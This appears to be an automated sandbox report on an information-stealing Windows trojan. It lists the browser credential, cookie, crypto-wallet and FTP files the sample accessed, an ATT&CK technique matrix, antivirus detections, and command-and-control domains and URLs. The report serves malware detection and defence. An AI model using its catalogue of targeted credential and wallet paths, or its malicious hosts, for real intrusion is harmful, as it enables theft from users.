            Source: file.exe, 00000000.00000003.2386311395.000000000176C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: file.exe, 00000000.00000003.2386357225.0000000001715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: file.exe, 00000000.00000003.2386311395.000000000176C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.2386311395.000000000176C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: Yara matchFile source: 00000000.00000003.2386311395.000000000176C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 4540, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 4540, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            11
            Process Injection
            34
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            751
            Security Software Discovery
            Remote Services41
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            11
            Process Injection
            LSASS Memory34
            Virtualization/Sandbox Evasion
            Remote Desktop ProtocolData from Removable Media11
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput Capture114
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing
            LSA Secrets223
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe45%ReversingLabsWin32.Trojan.Symmi
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://185.215.113.16/off/def.exep100%Avira URL Cloudphishing
            https://cook-rain.sbs/apiB100%Avira URL Cloudmalware
            https://cook-rain.sbs/(100%Avira URL Cloudmalware
            https://cook-rain.sbs/apixg3100%Avira URL Cloudmalware
            https://cook-rain.sbs/4100%Avira URL Cloudmalware
            https://cook-rain.sbs/api_time100%Avira URL Cloudmalware
            https://cook-rain.sbs/A100%Avira URL Cloudmalware
            https://cook-rain.sbs/api3100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            cook-rain.sbs
            188.114.97.3
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                www.google.com
                172.217.16.196
                truefalse
                  high
                  s-part-0032.t-0009.t-msedge.net
                  13.107.246.60
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        peepburry828.sbsfalse
                          high
                          p10tgrace.sbsfalse
                            high
                            processhol.sbsfalse
                              high
                              https://cook-rain.sbs/apifalse
                                high
                                https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                  high
                                  p3ar11fter.sbsfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_108.7.drfalse
                                      high
                                      https://cook-rain.sbs/api_timefile.exe, 00000000.00000003.2408998298.0000000001715000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cook-rain.sbs/api3file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431421805.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431168580.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cook-rain.sbs/Afile.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cook-rain.sbs/apixg3file.exe, 00000000.00000003.2274130411.00000000016F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
